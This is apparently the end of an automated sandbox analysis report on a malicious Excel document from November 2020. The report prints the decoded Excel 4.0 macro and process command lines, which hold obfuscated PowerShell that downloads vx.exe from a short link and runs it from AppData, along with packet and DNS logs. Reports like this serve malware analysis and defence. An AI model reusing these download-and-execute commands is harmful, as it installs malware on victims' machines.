                                                                                                                                            Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                                                                                                            Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1136
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:1136
                                                                                                                                            Entropy:4.08521227715
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . 2 . . . K . ` . A e ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                            Data Raw:93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 6f 00 00 7f 00 00 00 00 15 00 00 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 74
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:74
                                                                                                                                            Entropy:1.7969826379
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 09 00 00 00 00 00 03 00 74 00 00 7f 00 00 00 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:84
                                                                                                                                            Entropy:1.91120509258
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                                                                                                                            Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 103
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:103
                                                                                                                                            Entropy:1.89141813866
                                                                                                                                            Base64 Encoded:False
                                                                                                                                            Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
                                                                                                                                            Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                                                                                                                            Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 568
                                                                                                                                            General
                                                                                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                                                                            File Type:data
                                                                                                                                            Stream Size:568
                                                                                                                                            Entropy:6.35089764744
                                                                                                                                            Base64 Encoded:True
                                                                                                                                            Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                            Data Raw:01 34 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e8 8b 95 61 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                            Macro 4.0 Code

                                                                                                                                            "=ERROR(FALSE; (B100))""=IF(GET.WORKSPACE(19);;CLOSE(TRUE))""=IF(GET.WORKSPACE(42);;CLOSE(TRUE))""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('""&CHAR(104)&""ttps://cutt.ly/ZhqUH1O','vx.exe')"")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 20; Move-Item """"vx.exe"""" -Destination """"${enV`:appdata}"""""")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe"")"=PAUSE()

                                                                                                                                            Network Behavior

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 19, 2020 10:05:19.423196077 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.445290089 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.445456982 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.828624010 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.850589991 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.853207111 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.853231907 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.853244066 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.853368998 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.858606100 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.880615950 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.880635023 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.932826042 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.947360992 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:19.969451904 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:20.088221073 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:20.088244915 CET44349731104.22.1.232192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:20.088350058 CET49731443192.168.2.3104.22.1.232
                                                                                                                                            Nov 19, 2020 10:05:20.478147030 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:20.794853926 CET44349737202.92.6.10192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:20.794959068 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:20.795444012 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:21.111841917 CET44349737202.92.6.10192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:21.111855984 CET44349737202.92.6.10192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:21.111866951 CET44349737202.92.6.10192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:21.111881018 CET44349737202.92.6.10192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:21.111973047 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:21.111999035 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:21.126590014 CET49737443192.168.2.3202.92.6.10
                                                                                                                                            Nov 19, 2020 10:05:23.929683924 CET49731443192.168.2.3104.22.1.232

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 19, 2020 10:04:05.953275919 CET5836153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:05.966512918 CET53583618.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:07.214572906 CET6349253192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:07.227359056 CET53634928.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:08.113843918 CET6083153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:08.126806021 CET53608318.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:11.472129107 CET6010053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:11.485227108 CET53601008.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:15.066941977 CET5319553192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:15.086769104 CET53531958.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:15.413388968 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:15.459887028 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:16.482712984 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:16.495665073 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:17.495503902 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:17.508913994 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:19.506192923 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:19.519124985 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:23.522773027 CET5014153192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:23.543329954 CET53501418.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:29.095933914 CET5302353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:29.108159065 CET53530238.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:30.409176111 CET4956353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:30.422230959 CET53495638.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:31.814671993 CET5135253192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:31.837013960 CET53513528.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:31.984318972 CET5934953192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:31.997864962 CET53593498.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:35.048734903 CET5708453192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:35.061151981 CET53570848.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:36.400150061 CET5882353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:36.415482998 CET53588238.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:37.244415998 CET5756853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:37.257622004 CET53575688.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:38.174010992 CET5054053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:38.186300993 CET53505408.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:38.991889000 CET5436653192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:39.006484985 CET53543668.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:39.859208107 CET5303453192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:39.872103930 CET53530348.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:40.926212072 CET5776253192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:40.939018965 CET53577628.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:41.765012980 CET5543553192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:41.778045893 CET53554358.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:04:47.454478979 CET5071353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:04:47.466867924 CET53507138.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:08.217988014 CET5613253192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:05:08.230711937 CET53561328.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.187911034 CET5898753192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:05:19.201472044 CET53589878.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:19.361068010 CET5657953192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:05:19.379631042 CET53565798.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:20.146378040 CET6063353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:05:20.473684072 CET53606338.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:05:46.049911022 CET6129253192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:05:46.062267065 CET53612928.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:20.421422958 CET6361953192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:20.434407949 CET53636198.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:49.051702976 CET6493853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:49.064717054 CET53649388.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:49.941582918 CET6194653192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:49.955674887 CET53619468.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:50.782866955 CET6491053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:50.796199083 CET53649108.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:51.700256109 CET5212353192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:51.713793039 CET53521238.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:52.263158083 CET5613053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:52.276166916 CET53561308.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:53.156972885 CET5633853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:53.169481993 CET53563388.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:53.920691967 CET5942053192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:53.933777094 CET53594208.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:54.399332047 CET5878453192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:54.412719011 CET53587848.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:54.908641100 CET6397853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:54.922317982 CET53639788.8.8.8192.168.2.3
                                                                                                                                            Nov 19, 2020 10:06:55.211477041 CET6293853192.168.2.38.8.8.8
                                                                                                                                            Nov 19, 2020 10:06:55.224694014 CET53629388.8.8.8192.168.2.3

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Nov 19, 2020 10:05:19.187911034 CET192.168.2.38.8.8.80x191dStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                                                                                                            Nov 19, 2020 10:05:20.146378040 CET192.168.2.38.8.8.80xdfd1Standard query (0)shopphongtinh.comA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Nov 19, 2020 10:05:19.201472044 CET8.8.8.8192.168.2.30x191dNo error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)
                                                                                                                                            Nov 19, 2020 10:05:19.201472044 CET8.8.8.8192.168.2.30x191dNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                                                                                                            Nov 19, 2020 10:05:19.201472044 CET8.8.8.8192.168.2.30x191dNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                                                                                                                                            Nov 19, 2020 10:05:20.473684072 CET8.8.8.8192.168.2.30xdfd1No error (0)shopphongtinh.com202.92.6.10A (IP address)IN (0x0001)

                                                                                                                                            HTTPS Packets

                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                            Nov 19, 2020 10:05:19.853244066 CET104.22.1.232443192.168.2.349731CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                                                                                            CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:10:04:13
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                            Imagebase:0xb30000
                                                                                                                                            File size:27110184 bytes
                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:18
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                            File size:232960 bytes
                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:18
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                            File size:232960 bytes
                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:18
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:18
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                                                                                                            Imagebase:0xbd0000
                                                                                                                                            File size:232960 bytes
                                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:18
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:19
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:430592 bytes
                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:19
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                            Imagebase:0x7ff6b2800000
                                                                                                                                            File size:625664 bytes
                                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:19
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:430592 bytes
                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:10:04:20
                                                                                                                                            Start date:19/11/2020
                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
                                                                                                                                            Imagebase:0x12a0000
                                                                                                                                            File size:430592 bytes
                                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Reputation:high

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >